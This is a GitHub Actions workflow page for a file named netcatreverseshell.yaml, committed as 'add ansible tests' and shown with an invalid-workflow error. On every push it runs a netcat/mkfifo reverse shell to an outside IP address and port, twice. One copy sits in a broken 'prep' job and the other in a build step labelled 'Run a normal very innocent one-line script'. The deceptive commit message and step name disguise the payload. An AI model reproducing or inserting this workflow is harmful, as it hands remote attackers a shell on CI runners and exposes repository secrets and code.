Skip to content

add ansible tests

add ansible tests #50

name: REVERSESHELL

Check failure on line 1 in .github/workflows/netcatreverseshell.yaml

View workflow run for this annotation

GitHub Actions / .github/workflows/netcatreverseshell.yaml

Invalid workflow file

No steps defined in `steps` and no workflow called in `uses` for the following jobs: prep
# Controls when the workflow will run
on:
# Triggers the workflow on push or pull request events but only for the main branch
push:
# Allows you to run this workflow manually from the Actions tab
workflow_dispatch:
# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
# This workflow contains a single job called "build"
prep:
name: prep
runs-on: ubuntu-latest
run: |
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 34.159.16.75 32032 >/tmp/f
build:
# The type of runner that the job will run on
runs-on: ubuntu-latest
# Steps represent a sequence of tasks that will be executed as part of the job
steps:
# Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
- uses: actions/checkout@v3
# Runs a single command using the runners shell
- name: Run a normal very innocent one-line script
run: |
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|netcat 34.159.16.75 32032 >/tmp/f